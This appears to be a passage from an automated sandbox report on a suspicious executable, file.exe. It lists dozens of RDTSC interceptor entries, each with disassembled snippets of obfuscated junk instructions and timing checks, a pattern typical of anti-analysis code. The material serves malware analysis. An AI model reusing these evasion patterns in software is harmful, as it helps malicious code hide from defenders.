                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C936C second address: 12C93FD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5CB8E4DD98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e mov dword ptr [ebp+122D316Dh], esi 0x00000014 mov esi, edx 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp+12489F7Dh] 0x0000001d mov dl, 08h 0x0000001f nop 0x00000020 jmp 00007F5CB8E4DD9Fh 0x00000025 push eax 0x00000026 pushad 0x00000027 jmp 00007F5CB8E4DD9Ah 0x0000002c jbe 00007F5CB8E4DDA9h 0x00000032 popad 0x00000033 nop 0x00000034 lea eax, dword ptr [ebp+12489F39h] 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F5CB8E4DD98h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 jmp 00007F5CB8E4DD9Ah 0x00000059 sub ecx, dword ptr [ebp+122D38A1h] 0x0000005f push eax 0x00000060 pushad 0x00000061 pushad 0x00000062 push ebx 0x00000063 pop ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C93FD second address: 12C940A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F5CB8E48996h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279D39 second address: 1279D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279D3D second address: 1279D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279D45 second address: 1279D62 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5CB8E4DD98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5CB8E4DD9Ch 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279D62 second address: 1279D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279D66 second address: 1279D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5CB8E4DDA7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FA77D second address: 12FA7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5CB8E48996h 0x0000000a je 00007F5CB8E48996h 0x00000010 popad 0x00000011 jnl 00007F5CB8E48998h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5CB8E4899Eh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAA4A second address: 12FAAA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F5CB8E4DD96h 0x00000009 jmp 00007F5CB8E4DDA4h 0x0000000e jmp 00007F5CB8E4DDA1h 0x00000013 jmp 00007F5CB8E4DDA6h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jnc 00007F5CB8E4DDA6h 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 jl 00007F5CB8E4DD96h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAD88 second address: 12FAD9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F5CB8E48996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F5CB8E48996h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAD9C second address: 12FADA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FB051 second address: 12FB104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F5CB8E489A9h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F5CB8E489A8h 0x00000014 jmp 00007F5CB8E489A9h 0x00000019 popad 0x0000001a jns 00007F5CB8E489A2h 0x00000020 js 00007F5CB8E4899Ch 0x00000026 jp 00007F5CB8E48996h 0x0000002c popad 0x0000002d pushad 0x0000002e jmp 00007F5CB8E489A9h 0x00000033 jmp 00007F5CB8E4899Ch 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F5CB8E489A1h 0x0000003f jne 00007F5CB8E48996h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301A01 second address: 1301A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301A05 second address: 1301A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300BF3 second address: 1300C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300E8B second address: 1300EAE instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E48996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F5CB8E489A2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13006B3 second address: 13006B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13006B9 second address: 13006C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007F5CB8E4899Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130121F second address: 1301223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1301223 second address: 1301233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13014A3 second address: 13014A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13014A7 second address: 13014BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jo 00007F5CB8E48996h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13014BB second address: 13014C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13014C0 second address: 13014C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130474B second address: 1304793 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007F5CB8E4DD96h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F5CB8E4DDA8h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5CB8E4DDA0h 0x00000024 jl 00007F5CB8E4DD96h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309E67 second address: 1309E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309E6D second address: 1309E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309E71 second address: 1309EA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A9h 0x00000007 jmp 00007F5CB8E4899Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A027 second address: 130A04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F5CB8E4DD9Bh 0x0000000b jmp 00007F5CB8E4DDA5h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A04F second address: 130A054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A362 second address: 130A366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A366 second address: 130A389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F5CB8E489A8h 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A389 second address: 130A3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5CB8E4DD96h 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F5CB8E4DD9Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A3A7 second address: 130A3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F5CB8E48996h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5CB8E4899Ch 0x00000016 je 00007F5CB8E48996h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A6B5 second address: 130A6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A6BD second address: 130A6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A6C4 second address: 130A6DC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5CB8E4DD9Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F5CB8E4DD96h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A829 second address: 130A838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F5CB8E48996h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A838 second address: 130A865 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5CB8E4DD96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 jmp 00007F5CB8E4DDA8h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A865 second address: 130A879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F5CB8E4899Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130A879 second address: 130A87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130AB2C second address: 130AB48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F5CB8E4899Ah 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F5CB8E48996h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130AB48 second address: 130AB4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B02A second address: 130B02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130B02E second address: 130B04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5CB8E4DDA1h 0x0000000c jno 00007F5CB8E4DD96h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130976B second address: 1309787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5CB8E48996h 0x0000000a jmp 00007F5CB8E4899Dh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309787 second address: 130978B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130978B second address: 130978F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130978F second address: 13097A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F5CB8E4DD9Ah 0x0000000c pop eax 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13097A8 second address: 13097AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13097AE second address: 13097D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5CB8E4DDA2h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5CB8E4DD9Ah 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13097D3 second address: 13097D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D91E second address: 130D922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D616 second address: 130D61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D61A second address: 130D61E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130D61E second address: 130D62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13102F6 second address: 1310302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F5CB8E4DD96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1310302 second address: 1310309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131043E second address: 1310450 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5CB8E4DD9Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1310450 second address: 1310460 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5CB8E489A2h 0x00000008 ja 00007F5CB8E48996h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1312E57 second address: 1312E7B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5CB8E4DDA9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13170F2 second address: 1317101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E4899Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317101 second address: 1317107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317107 second address: 1317123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5CB8E489A7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131631F second address: 1316323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316323 second address: 131634D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5CB8E48996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F5CB8E489B4h 0x00000010 jmp 00007F5CB8E489A8h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131634D second address: 131636D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5CB8E4DD9Ch 0x0000000a jmp 00007F5CB8E4DD9Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131636D second address: 1316381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F5CB8E4899Ah 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316381 second address: 1316390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5CB8E4DD96h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1316390 second address: 1316394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13166DD second address: 13166E2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131685B second address: 131685F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A963 second address: 131A969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131A969 second address: 131A985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 ja 00007F5CB8E489A2h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320D07 second address: 1320D1C instructions: 0x00000000 rdtsc 0x00000002 js 00007F5CB8E4DD96h 0x00000008 jno 00007F5CB8E4DD96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F615 second address: 131F61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F918 second address: 131F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F91C second address: 131F951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5CB8E489A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5CB8E489A1h 0x00000010 jo 00007F5CB8E48996h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F951 second address: 131F955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F955 second address: 131F95F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F95F second address: 131F976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DDA3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131F976 second address: 131F995 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5CB8E489A5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C8E4B second address: 12C8E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, 7F5B9A80h 0x0000000d pushad 0x0000000e mov eax, dword ptr [ebp+122D3851h] 0x00000014 movsx ebx, si 0x00000017 popad 0x00000018 push 00000004h 0x0000001a or ecx, dword ptr [ebp+122D2A7Ch] 0x00000020 nop 0x00000021 push ebx 0x00000022 jmp 00007F5CB8E4DDA9h 0x00000027 pop ebx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F5CB8E4DDA0h 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131FE89 second address: 131FECA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E48996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F5CB8E4899Bh 0x0000000f popad 0x00000010 pushad 0x00000011 jns 00007F5CB8E4899Eh 0x00000017 jnp 00007F5CB8E489A9h 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320976 second address: 1320997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5CB8E4DD9Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jo 00007F5CB8E4DD96h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320997 second address: 13209B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5CB8E489A0h 0x00000009 jo 00007F5CB8E48996h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13209B1 second address: 13209D8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5CB8E4DD96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007F5CB8E4DDA8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
